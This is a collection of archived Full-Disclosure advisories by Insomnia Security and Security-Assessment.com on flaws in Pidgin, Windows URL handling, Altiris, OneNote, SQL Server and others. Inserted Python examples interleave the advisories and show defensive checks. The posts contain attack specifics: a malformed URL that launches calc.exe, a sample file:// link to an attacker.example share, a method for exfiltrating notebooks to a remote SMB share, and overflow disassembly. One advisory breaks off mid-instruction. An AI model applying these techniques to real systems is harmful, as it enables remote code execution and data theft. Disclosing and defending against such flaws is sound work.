[Full-disclosure] Insomnia : ISVA-110822.1 - Pidgin IM Insecure URL Handling Remote Code Execution

2011-08-22 Thread Brett Moore
___

 Insomnia Security Vulnerability Advisory: ISVA-110822.1
___

 Name: Pidgin IM Insecure URL Handling Remote Code Execution
 Reported: 21 July 2011
 
 Vendor Link:
http://www.pidgin.im
 
 Affected Products:
Pidgin Instant Messaging Client <= 2.9.0
 
 Original Advisory:
http://www.insomniasec.com/advisories/ISVA-110822.1.htm
 
 Researcher:
James Burton, Insomnia Security
http://www.insomniasec.com
___


___

 Description
___

Pidgin is an open source instant messaging client that allows users
to log in to accounts on multiple chat networks simultaneously.

An insecure URL handling vulnerability exists in Pidgin <= 2.9.0
that can be exploited to cause remote code execution.

This vulnerability requires user interaction in the form of clicking
a malicious crafted URL.

___

 Details
___

Pidgin supports the use of URL handlers in IM sessions.  The Windows build
passes URLs directly to the ShellExecute API where they are executed under
the context of the user running the application.

When passed through a file:// URL a malicious executable can be hosted
and executed off a remote WEBDAV/SMB share.

This vulnerability requires user interaction in the form of clicking a
crafted URL, but Pidgin's Insert -> Link function gives the option of adding
a description which masks the underlying link.

This makes the task of social engineering the target a trivial one.

This vulnerability has only been confirmed over Google-Talk though
exploitation over other chat networks may be possible.

___

 Solution
___

Upgrade to Pidgin 2.10.0 from http://www.pidgin.im/
The Pidgin changelog can be found http://developer.pidgin.im/wiki/ChangeLog

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
 Insomnia Security Vulnerability Advisory: ISVA-110822.1
___

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Insomnia : ISVA-100216.1 - Windows URL Handling Vulnerability

2010-02-16 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-100216.1
___

 Name: Windows URL Handling Vulnerability 
 Released: 16 February 2010
  
 Vendor Link: 
http://www.microsoft.com/
  
 Affected Products:
Windows 2000, Windows XP, Windows 2003, Windows Vista
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-100216.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

A flaw exists in the handling of malformed URLs passed through
the ShellExecute() API. The vulnerability does not directly cause
an issue within Windows itself; however, applications that call
the flawed API may be vulnerable to various attacks, one of which
is shown in this report.

___

 Details
___

The vulnerability is reached when the malformed URL contains #: 
and can be used to reference local files.

Two such examples are shown here;
acrobat://test/#://../../c:/windows/system32/calc.exe
or
anything://test/#://../../c:/windows/system32/calc.exe

The results will be different dependent on where the URL is used
and which OS platform is in use.

Some examples are shown here;

Start-Run
Calc.exe is executed without prompt

IE URL Bar or HREF
User is prompted to execute calc.exe

Word Document
User is prompted to open acrobat link

PDF Document
Calc.exe is executed without prompt

Firefox
Firefox will not follow the URL

Safari
Calc.exe is executed without prompt  
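Added example, not Insomnia Security's, Pidgin's or Microsoft's code: a pre-dispatch check that a client could run on a link before handing it to a URL handler or ShellExecute. It covers the Pidgin advisory above (file:// URLs that resolve to a remote WebDAV/SMB share) and the '#:' malformed-URL pattern from this advisory in one routine. The function names, the executable suffix list and the reject policy are assumptions, and the sample URLs in the test are constructed.

```python
"""Pre-dispatch check for URLs that would otherwise go straight to a
protocol handler or ShellExecute. Added example; the policy, the
function names and the suffix list are assumptions."""
import re
from urllib.parse import unquote, urlparse

# Assumption: file types a chat client should never launch from an untrusted link.
EXECUTABLE_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif",
                       ".msi", ".vbs", ".js", ".hta", ".lnk")

# '..' as a whole path segment, with either slash style, anywhere in the URL.
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def classify_url(url: str) -> list:
    """Return the findings for one URL; an empty list means nothing matched."""
    findings = []
    decoded = unquote(url)          # percent-decode first so %2e%2e and %23 are seen
    lower = decoded.lower()
    parsed = urlparse(decoded)

    # Finding 1 (Pidgin advisory): file:// with a host part, or a UNC path,
    # resolves to a remote WebDAV/SMB share rather than a local file.
    if (parsed.scheme == "file" and parsed.netloc not in ("", "localhost")) \
            or "\\\\" in decoded:
        findings.append("remote file share")

    # Finding 2 (Windows URL handling advisory): a '#:' sequence turns the
    # fragment into a second path that the handler may act on.
    if "#:" in decoded:
        findings.append("malformed fragment '#:'")

    # Finding 3: parent-directory traversal in the path or fragment.
    if TRAVERSAL.search(decoded):
        findings.append("path traversal")

    # Finding 4: the URL ends in something Windows would execute.
    target = lower.split("?", 1)[0].rstrip("/")
    if target.endswith(EXECUTABLE_SUFFIXES):
        findings.append("executable target")

    return findings


def safe_to_dispatch(url: str) -> bool:
    """True only when no finding matched; gate the handler call on this."""
    return not classify_url(url)


if __name__ == "__main__":
    for sample in ("file://attacker.example/share/update.exe",
                   "acrobat://test/#://../../c:/windows/system32/calc.exe",
                   "https://www.pidgin.im/"):
        print(sample, "->", classify_url(sample) or "ok")
```

The check runs on the percent-decoded string so that an encoded `%23` or `%2e%2e` cannot slip past it; it deliberately reports every matching pattern rather than stopping at the first, which makes the log line from a rejected link more useful to whoever triages it.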
  
___

 Potential Exploit
___
  
Safari will not access the local file through the standard
file:// link, but will execute the local file through the malformed
link.

One method of executable delivery is through the onenote:// 
URL protocol if Microsoft OneNote is installed.

OneNote will automatically open and process a onenote file shared
over an SMB share. Any executables stored within the onenote file
will be cached locally. This is done by downloading the embedded
executables and storing them in a known location.

C:/Users/[USERNAME]/AppData/Local/Microsoft/OneNote/12.0/OneNoteOfflineCache
_Files/

This file can then be executed through the URL handling vulnerability
leading to an automatic code execution issue through Safari.

Obviously there are some requirements for this exploit;
+ the target user name must be known
+ Microsoft OneNote must be installed
+ SMB access out must be allowed
  
___

 Solution
___

Microsoft have released a security update to address this issue;
http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx
http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.
___
 
Insomnia Security Vulnerability Advisory: ISVA-100216.1
___




[Full-disclosure] Insomnia : ISVA-081209.1 - IE Webdav Request Parsing Heap Corruption Vulnerability

2008-12-10 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-081209.1
___

 Name: IE Webdav Request Parsing Heap Corruption Vulnerability 
 Released: 09 December 2008
  
 Vendor Link: 
http://www.microsoft.com/
  
 Affected Products:
Microsoft Internet Explorer 7 Running On Vista
Requires Office 2007
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-081209.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

A vulnerability was found in the way that webdav requests are
cached and then later retrieved by Internet Explorer. This results
in the use of uninitialized memory which under the right situation 
can lead to command execution.

___

 Details
___

When Internet Explorer loads a file from a webdav share, a copy of
the file is stored in

\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

This copy is used as the cached version of the file, and is loaded 
if a page refresh is done.

If the size of the requested file is larger than 190 characters then
the webdav handling service will not save it correctly.

Internet Explorer assumes that the file was stored, and is cached, so
when a refresh is done it attempts to load the file information from
the cached data.

This leads to a heap corruption with various values read that lead 
to exploitable conditions.

___

 Solution
___

Microsoft have released a security update to address this issue;
http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
Insomnia Security Vulnerability Advisory: ISVA-081209.1
___



[Full-disclosure] Insomnia : ISVA-081020.1 - Altiris Deployment Server Agent - Privilege Escalation

2008-10-22 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-081020.1
___

 Name: Altiris Deployment Server Agent - Privilege Escalation 
 Released: 20 October 2008
  
 Vendor Link: 
http://www.altiris.com/
  
 Affected Products:
Altiris Deployment Server 6.X
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-081020.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

Altiris Deployment Server agent is installed as part of the 
Altiris packages to allow the Deployment Server to manage software
for machines. It is usually installed to 
C:\Program Files\Altiris\AClient and the main running agent 
is called AClient.exe. 

By default the agent runs under the Local System account and is
vulnerable to numerous Shatter Attack vulnerabilities leading
to an attacker running code under the Local System privilege.

We reported a first instance of this vulnerability, which was
then patched; we then alerted Symantec to the second vulnerability.

___

 Details
___

The main window of the AClient GUI has a hidden button that
can be seen using a resource viewer such as MS Spy++. The
button has a caption of "command prompt".

Clicking this button causes the GUI to attempt to call 
CreateProcess() with the following CommandLine parameter.
c:\Program Files\Altiris\AClient\cmd.exe

The AClient GUI also has a ListView control which can be
used to overwrite process memory. Using the ListView, it is
possible to overwrite a static pointer to modify the CommandLine
parameter in such a way that a cmd.exe shell is executed with
SYSTEM level privileges.

We then reported the second issue.

The deployment server agent makes use of the LoadLibrary() API
function and passes a static address of a string from within the
data segment.

By exploiting the ListView to overwrite the data segment string, 
it is possible to cause the agent to load a malicious dll file.

From the aclient.exe code
004AA890   PUSH ESI
004AA891   PUSH EDI
004AA892   PUSH AClient.005858A0; ASCII "kernel32.dll"
004AA897   XOR EDI,EDI
004AA899   CALL DWORD PTR DS:[KERNEL32.LoadLibrar;

The malicious dll file can then spawn a command shell, or similar,
running under the LocalSystem context.

___

 Solution
___

Symantec have released a security update to address this issue;
http://www.symantec.com/avcenter/security/Content/2008.10.20a.html

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
Insomnia Security Vulnerability Advisory: ISVA-081020.1
___



[Full-disclosure] Insomnia : ISVA-080910.1 - MS Office OneNote URL Handling Vulnerability

2008-09-10 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-080910.1
___

 Name: MS Office OneNote URL Handling Vulnerability
 Released: 10 September 2008
  
 Vendor Link: 
http://office.microsoft.com/onenote
  
 Affected Products:
MS Office Onenote 2007
MS Office 2003 and 2007 have vulnerable components
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-080910.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

OneNote is included as part of office 2007, and provides an easy
way to store, manage, and share information.

OneNote installs a URL Handler under the registry key 
  HKEY_CLASSES_ROOT\OneNote 

with an open command specified as 
  C:\PROGRA~1\MICROS~2\Office12\ONENOTE.EXE /hyperlink %1
  
Due to the URL Handler, OneNote can be started from Internet
Explorer through a URI reference of 
  onenote://onenotefile 

Where onenotefile is a locally hosted file, or a file accessible
through a UNC/WebDav share.

The instance of OneNote started will be executed through the
IEUSER.EXE process running under the currently logged in user.
 
OneNote is one of the few Microsoft installed applications that
does NOT PROMPT the user, before executing from the URL.

Through the use of command line switches passed to OneNote from 
a URL, we found two exploitation scenarios.

___

 Details
___

- File Transfer to Client -

OneNote accepts a command switch to specify the location of the
local cache directory. By specifying this switch on the URL, it is
possible to specify an arbitrary location on the client, which
will be used to cache the opened notebooks.

If a notebook is loaded from a remote share, a local copy will be
created under the cache directory. When OneNote caches the notebook
it makes a local copy of any binary files that are embedded inside
the notebook.

This allows the placement of binary files in a 'semi arbitrary'
location that can then be used in conjunction with social engineering
emails, or other attacks that require the knowledge of the location
of a file.

There may also be other attack vectors through the placement of
specially named files within search paths.

- Theft of Users OneNote Notebooks -

OneNote accepts a command switch to specify the location of the
backup directory. 

It is possible to specify an SMB share location on a remote server,
which will be used to back up the notebooks. This results in copies
of all opened notebooks being sent to the remote share.

___

 Solution
___

Microsoft have released a security update to address this issue;
http://www.microsoft.com/technet/security/bulletin/ms08-055.mspx

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
Insomnia Security Vulnerability Advisory: ISVA-080910.1
___




[Full-disclosure] Insomnia : ISVA-080709.1 - Microsoft SQL Server - Corrupt Backup File Heap Overflow

2008-07-09 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-080709.1
___

 Name: Microsoft SQL Server - Corrupt Backup File Heap Overflow
 Released: 09 July 2008
  
 Vendor Link: 
http://www.microsoft.com/sql/default.mspx
  
 Affected Products:
MS SQL Server 2005, possibly previous versions
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-080709.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

Microsoft SQL Server contains a buffer overflow that can be reached
by causing the server to attempt a database restore from a corrupt
backup file.

This can be triggered by a user with PUBLIC access through the
RESTORE TSQL statement, available through the console as well as
through a vulnerable SQL statement on a web server (SQL injection).

By default the service runs under the NETWORK SERVICE account but
has the ability to impersonate through tokens, and therefore
can gain full LOCAL SYSTEM account access.

___

 Details
___

The following TSQL statement can be called by any user with PUBLIC
access.

RESTORE FILELISTONLY FROM DISK = 'path to file'

By hosting a corrupt SQL database backup on a remote file share
it is possible to force the target server to open the file, parse
it, and corrupt the internal heap.

Obviously the target SQL server must have egress availability to 
connect out through SMB or webdav functionality.

The SQL backup format consists of multiple chunks of data which 
follow a basic structure of
  
  struct backupChunk {
    unsigned long nametag;
    unsigned long size;
  };

The nametag describes the type of tag (e.g. SCIN, SFGI, MQCI, etc.).
The size corresponds to the complete chunk size, which
includes the 8-byte chunk header.

The parsing function goes through the file using the backupChunk size
field to point to the next valid chunk.

---
022E5FE2 PUSH EAX
022E5FE3 MOV EAX, [ESP+18h]
022E5FE7 PUSH EAX
022E5FE8 PUSH ESI
022E5FE9 CALL EDX   ;   -- This loads the 8byte header of the block
022E5FEB PUSH EBX
022E5FEC MOV ECX,ESI
---

If the size field is larger than the current buffer, a check 
prevents the application from overflowing.

---
Size Check
022E6063 MOV EAX,DWORD PTR DS:[EDX+4]  ;- Load Size
022E6066 MOV ECX,DWORD PTR SS:[ESP+14] ;- Load Buffer Size
022E606A SUB ECX,EAX
022E606C JS SHORT sqlservr.022E6076
022E606E CMP EAX,DWORD PTR DS:[EBX+C8] ;- Compare against 0x2000
022E6074 JBE SHORT sqlservr.022E60DC   ;- Jump to continuation
---

After this size comparison, the size is adjusted to subtract the
size of the 8byte structure header.

---
The size decrease
022E60DC MOV ECX,DWORD PTR SS:[ESP+10]
022E60E0 MOV EDI,DWORD PTR DS:[ECX+4]
022E60E3 SUB EDI,8; - Subtract 8 bytes
022E60E6 CMP DWORD PTR DS:[EBX+40],0
022E60EA JA SHORT sqlservr.022E6107
---

If the structure size was a value between 0 and 7 then an Integer 
Underflow/Overflow/Wraparound/Whatever will occur, and the 
'negative' large value is passed directly into the StartRead
function.

---
The write
022E6115 MOV EDX,DWORD PTR DS:[EDX+60]
022E6118 PUSH EDI; - Push the new 'negative' size
022E6119 PUSH EAX
022E611A MOV EAX,DWORD PTR SS:[ESP+18]
022E611E ADD EAX,8
022E6121 PUSH EAX
022E6122 PUSH ESI
022E6123 CALL EDX;  call StartRead
022E6125 PUSH EBX
---

StartRead, among other things, uses the size value in a call to 
_memcpy, that will read the available data from the file 
overflowing the buffer and overwriting heap memory.

---
022D44BC MOV EBX,[EBP+arg_4]
022D44BF PUSH ESI  ; - The 'negative' size
022D44C0 PUSH EAX  ; void *
022D44C1 PUSH EBX  ; void *
022D44C2 CALL _MEMCPY  ; - Call to memcpy
---
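As an added example (not the advisory author's code, and not the real SQL Server backup parser): a walker over the chunk structure described above, with the size check the advisory shows reproduced as written and the lower bound it lacks (size must be at least the 8-byte header) added behind a flag. The byte layout is an assumption made to have something to parse, and the sample buffers are constructed. A chunk whose size field is 4 passes the original check and turns into a 0xFFFFFFFC-byte copy length, which is the wraparound the advisory describes; the hardened path rejects it before any length reaches the read routine.

```python
"""Chunk walker for the backup layout described in the advisory.
Added example; the little-endian layout and the 0x2000 limit as a
constant are assumptions."""
import struct

# 4-byte ASCII nametag + 32-bit size, the size counting the header itself.
CHUNK_HEADER = struct.Struct("<4sI")
HEADER_LEN = CHUNK_HEADER.size          # 8 bytes
MAX_CHUNK = 0x2000                      # upper bound seen in the advisory's size check


def payload_length(size, remaining, hardened=True):
    """Byte count the read routine would be asked to copy for one chunk.

    The first two tests mirror the advisory's check (size within the
    buffer, size below 0x2000). The third is the missing lower bound
    that stops 'size - 8' from wrapping to a huge unsigned value.
    """
    if size > remaining:
        raise ValueError(f"chunk size {size} exceeds remaining buffer {remaining}")
    if size > MAX_CHUNK:
        raise ValueError(f"chunk size {size} exceeds limit {MAX_CHUNK:#x}")
    if hardened and size < HEADER_LEN:
        raise ValueError(f"chunk size {size} is smaller than the {HEADER_LEN}-byte header")
    return (size - HEADER_LEN) & 0xFFFFFFFF   # 32-bit wraparound, like SUB EDI,8


def walk_chunks(buf, hardened=True):
    """Walk the chunk list and return (tag, payload_length) pairs."""
    chunks = []
    off = 0
    while off < len(buf):
        remaining = len(buf) - off
        if remaining < HEADER_LEN:
            raise ValueError("truncated chunk header")
        tag, size = CHUNK_HEADER.unpack_from(buf, off)
        n = payload_length(size, remaining, hardened)
        chunks.append((tag.decode("ascii"), n))
        if n > remaining - HEADER_LEN:
            # Only reachable on the unhardened path: a memcpy of n bytes
            # would run past the end of the buffer here, so stop.
            break
        off += HEADER_LEN + n
    return chunks


def rejects(buf):
    """True when the hardened walker refuses the buffer."""
    try:
        walk_chunks(buf, hardened=True)
    except ValueError:
        return True
    return False


def chunk(tag, payload):
    """Build one well-formed chunk (constructed test data)."""
    return CHUNK_HEADER.pack(tag, HEADER_LEN + len(payload)) + payload


# Constructed buffers: a valid pair of chunks, and one whose second header
# claims a size of 4, below the header length but within both original limits.
GOOD = chunk(b"SCIN", b"\x01\x02\x03\x04") + chunk(b"SFGI", b"hello")
BAD = chunk(b"SCIN", b"\x01\x02\x03\x04") + CHUNK_HEADER.pack(b"MQCI", 4) + b"\x00" * 16


if __name__ == "__main__":
    print("good:", walk_chunks(GOOD))
    print("bad, original check only:", walk_chunks(BAD, hardened=False))
    print("bad, hardened:", "rejected" if rejects(BAD) else "accepted")
```

The point to carry away is that an upper-bound check on a length field is not enough on its own when the code later subtracts a header size from it; the lower bound has to be checked against the same field before the subtraction happens.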

The result of exploitation is that heap memory is overflowed. 

We have had successful exploitable 'exceptions' in the following 
places;

---
A 'write 4'
0116D35A JE sqlservr.011C6BCE
0116D360 MOV EAX,DWORD PTR DS:[EAX+C]
0116D363 MOV ECX,DWORD PTR SS:[EBP-10]
0116D366 MOV EDX,DWORD

[Full-disclosure] Insomnia : ISVA-080516.1 - Altiris Deployment Solution - SQL Injection

2008-05-18 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-080516.1
___

 Name: Altiris Deployment Solution - SQL Injection
 Released: 16 May 2008
  
 Vendor Link: 
http://www.altiris.com/
  
 Affected Products:
Altiris Deployment Solution 6.8.x & 6.9.x
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-080516.1.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

Altiris deployment solution is a suite installed to manage the 
configuration and operation of machines on the network. SQL Server 
is used as the backend database. 

Altiris deployment solution listens for connections from the Altiris
client on port 402. It is possible to make a request that will
result in the exploitation of a SQL Injection vulnerability. This
leads to database access under the context of the Deployment server,
which typically then allows command execution under the context of
the SQL Server.

Note that through access to the SQL server, it is possible to take 
control of all clients managed by the server.
___

 Details
___

When a client machine that is running Altiris client 'comes alive'
it makes contact with the Deployment server and sends a 
notification packet to alert the server that the client machine 
is available. 

This packet is an ASCII based packet with a terminating NULL 
character.

At least two of the strings contained in this packet can be used 
to inject arbitrary SQL syntax into a SQL call, resulting in 
SQL injection.
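Added example, not Altiris or Symantec code: the defensive pattern for a notification packet like the one described, with the packet's strings bound as parameters instead of spliced into SQL text. The packet layout (NUL-separated ASCII fields with a terminating NUL) and the table are assumptions made so the example runs; the advisory gives neither. The sample packet is constructed, and a hostname containing an apostrophe is enough to show the difference: with string-built SQL the quote reaches the parser as syntax, with a bound parameter it stays data.

```python
"""Handling a NUL-terminated ASCII notification packet without building
SQL from its strings. Added example; packet layout and schema are
assumptions."""
import sqlite3

SCHEMA = "CREATE TABLE clients (hostname TEXT, mac TEXT, ip TEXT)"


def parse_notification(packet: bytes) -> list:
    """Split the NUL-terminated ASCII packet into its fields."""
    if not packet.endswith(b"\x00"):
        raise ValueError("packet is missing its terminating NUL")
    body = packet[:-1]
    if not body.isascii():
        raise ValueError("non-ASCII byte in packet")
    fields = body.decode("ascii").split("\x00")
    if len(fields) != 3:
        raise ValueError(f"expected 3 fields, got {len(fields)}")
    return fields


def register_concat(conn, fields):
    """The pattern the advisory describes: packet strings spliced into SQL text."""
    host, mac, ip = fields
    conn.execute(f"INSERT INTO clients VALUES ('{host}', '{mac}', '{ip}')")


def register_param(conn, fields):
    """Hardened: the driver binds the values, so quote characters stay data."""
    conn.execute("INSERT INTO clients VALUES (?, ?, ?)", fields)


def stored_hostnames(conn):
    return [row[0] for row in conn.execute("SELECT hostname FROM clients ORDER BY rowid")]


def process(packet: bytes, register):
    """Run one packet through the given registration routine on a fresh in-memory DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    try:
        register(conn, parse_notification(packet))
    except sqlite3.Error as exc:
        # With string-built SQL a quote in a field is already a syntax error:
        # the field content reached the SQL parser instead of staying data.
        return ("error", type(exc).__name__)
    return ("ok", stored_hostnames(conn))


# Constructed packet: hostname with an apostrophe, a MAC address and an IP.
PACKET = b"O'Brien-PC\x0000:11:22:33:44:55\x00192.0.2.10\x00"


if __name__ == "__main__":
    print("concatenated:", process(PACKET, register_concat))
    print("parameterised:", process(PACKET, register_param))
```

The syntax error from the concatenated version is the benign symptom; a value shaped to keep the statement valid would instead run as SQL under the Deployment server's database account, which is the outcome the advisory reports. Parameter binding closes that path regardless of what the field contains.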

___

 Solution
___

Symantec have released a security update to address this issue;
http://www.symantec.com/avcenter/security/Content/2008.05.14a.html

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
Insomnia Security Vulnerability Advisory: ISVA-080516.1
___



[Full-disclosure] Insomnia : ISVA-080516.2 - Altiris Deployment Solution - Domain Account Disclosure

2008-05-18 Thread Brett Moore
__

 Insomnia Security Vulnerability Advisory: ISVA-080516.2
___

 Name: Altiris Deployment Solution - Domain Account Disclosure
 Released: 16 May 2008
  
 Vendor Link: 
http://www.altiris.com/
  
 Affected Products:
Altiris Deployment Solution 6.8.x & 6.9.x
 
 Original Advisory: 
http://www.insomniasec.com/advisories/ISVA-080516.2.htm
 
 Researcher: 
Brett Moore, Insomnia Security
http://www.insomniasec.com
___

___

 Description
___

Altiris deployment solution is a suite installed to manage the 
configuration and operation of machines on the network. Part of 
the Deployment solution setup involves configuring the domain 
accounts to be used to access the various clients for imaging 
and configuration jobs.

Altiris deployment solution listens for connections from the 
Altiris client on port 402. It is possible to make a request to 
this port that will result in the encrypted domain credentials 
being returned.  

The encryption is not salted or specific to the install, allowing 
for offsite decryption of the credentials.

___

 Details
___

The retrieved encrypted credentials can be placed into a local
installation, through direct insertion into the SQL server
database. The GUI can then be used to view the decrypted 
credentials.

Alternatively a standalone tool to decrypt the credentials could 
easily be written.

___

 Solution
___

Symantec have released a security update to address this issue;
http://www.symantec.com/avcenter/security/Content/2008.05.14a.html

___

 Legals
___

The information is provided for research and educational purposes
only. Insomnia Security accepts no liability in any form whatsoever
for any direct or indirect damages associated with the use of this
information.

___
 
Insomnia Security Vulnerability Advisory: ISVA-080516.2
___



[Full-disclosure] SUN Java JNLP Overflow

2007-07-11 Thread Brett Moore

= SUN Java JNLP Overflow
=
= Vendor Advisory:  
= http://sunsolve.sun.com/search/document.do?assetkey=1-26-102996-1
=
= Affected Software:
=  Java Web Start in JDK and JRE 6 Update 1 and earlier
=  Java Web Start in JDK and JRE 5.0 Update 11 and earlier
=
= Public disclosure on Wednesday July 11, 2007


== Overview ==

http://www.google.co.nz/search?hl=en&q=same+bug+different+app&meta=

My guess is that two years down the track, nobody really took any
notice.

eEye posted their advisory a couple of days ago. Check it if you
want the technical details.

Not surprising that it was also discovered by another person, and most
likely more than one.

1) Start-Regedit
2) Edit-Search-editflags
3) Find those that have a flag set of BINARY 00 00 01 00
4) *yawn*
5) Find a valid file of that type
 
http://java.sun.com/j2se/1.4.2/docs/guide/jws/developersguide/syntax.html
6) Try a long string in an obvious place
7) Watch the debugger kick in
8) Finish your cup of coffee

== Solutions ==

SUN has released a patch
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102996-1

This class of vulnerability is well known, and future cases can be 
mitigated by removing or modifying the editflags value for all
registry entries that have 'Disable Open/Save dialog box' set.
http://mc-computing.com/WinExplorer/WinExplorerEditFlags.htm
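The steps above (search the registry for EditFlags values of BINARY 00 00 01 00) and the mitigation just described can be scripted. Added example, not the post author's code: 00 00 01 00 is the little-endian encoding of FTA_OpenIsSafe (0x00010000) from the shlwapi FILETYPEATTRIBUTEFLAGS set, the flag behind "Disable Open/Save dialog box"; the OneNote advisory earlier in this listing (OneNote does not prompt before executing from a URL) is the same property. The decode and flag tests run anywhere; the registry walk only does anything on Windows, and the function names are mine.

```python
"""Audit helper for the EditFlags value of Windows file types and URL
handlers. Added example; flag constants are the shlwapi
FILETYPEATTRIBUTEFLAGS values, everything else is an assumption."""
import sys

FTA_OPENISSAFE = 0x00010000     # "Disable Open/Save dialog box": open without prompting
FTA_ALWAYSUNSAFE = 0x00020000   # never treat the type as safe, regardless of the above


def decode_editflags(value):
    """EditFlags is stored either as REG_DWORD or as little-endian REG_BINARY."""
    if isinstance(value, int):
        return value & 0xFFFFFFFF
    if isinstance(value, (bytes, bytearray)) and 1 <= len(value) <= 4:
        return int.from_bytes(bytes(value).ljust(4, b"\x00"), "little")
    raise TypeError("EditFlags must be an int or up to 4 little-endian bytes")


def opens_without_prompt(value):
    """True when the type would launch from a browser without the Open/Save dialog."""
    flags = decode_editflags(value)
    return bool(flags & FTA_OPENISSAFE) and not (flags & FTA_ALWAYSUNSAFE)


def clear_open_is_safe(value):
    """The DWORD an administrator would write back to restore the prompt."""
    return decode_editflags(value) & ~FTA_OPENISSAFE & 0xFFFFFFFF


def audit_hkcr():
    """Windows only: list HKEY_CLASSES_ROOT subkeys whose EditFlags set
    FTA_OpenIsSafe. Returns [] on other platforms so the pure functions
    above stay importable anywhere."""
    if sys.platform != "win32":
        return []
    import winreg
    hits = []
    index = 0
    while True:
        try:
            name = winreg.EnumKey(winreg.HKEY_CLASSES_ROOT, index)
        except OSError:
            break                     # no more subkeys
        index += 1
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name) as key:
                value, _ = winreg.QueryValueEx(key, "EditFlags")
        except OSError:
            continue                  # key has no EditFlags value
        try:
            if opens_without_prompt(value):
                hits.append(name)
        except TypeError:
            pass                      # unexpected value type; skip it
    return hits


if __name__ == "__main__":
    for progid in audit_hkcr():
        print(progid)
```

Each ProgID the walk reports is a type that a browser will pass straight to its handler, which is exactly the set the post suggests reviewing; the clear function gives the replacement value for the ones that should prompt again.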

== Credit ==

Discovered and advised to SUN November 15 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendors' products. 
Members of the Security-Assessment.com R&D team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of 
Australia supplier and sits on the Australian Government 
Attorney-General's Department Critical Infrastructure Project panel. 
We are certified by both Visa and MasterCard under their Payment 
Card Industry Data Security Standard Programs.



[Full-disclosure] Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities

2007-02-15 Thread Brett Moore

= Lizardtech DjVu Browser Plug-in - Multiple Vulnerabilities
=
= Vendor Website: 
= http://www.lizardtech.com/
=
= Affected Version:
=    Windows DjVu Browser Plug-in < 6.1.1
=
= Public disclosure on February 15th 2007


== Overview ==

The DjVu Browser Plug-in is the primary means of viewing DjVu documents.

It runs inside most modern browsers including IE, Firefox and Safari.

Versions prior to 6.1.1 are vulnerable to buffer overflows through
various functions. One such example is through the ExportImageAs method.

It should be noted that CERT contacted Lizardtech at about the same time
as we did, advising of numerous overflow problems as well. These have
also been addressed by this update.

== Solutions ==

- Upgrade to version 6.1.1 from the lizardtech website
http://www.lizardtech.com/
   
== Credit ==

Discovered and advised to Lizardtech November 2006, by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendors' products. 
Members of the Security-Assessment.com R&D team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.



[Full-disclosure] MS Interactive Training .cbo Overflow

2007-02-14 Thread Brett Moore

= MS Interactive Training .cbo Overflow
=
= MS Bulletin posted: 
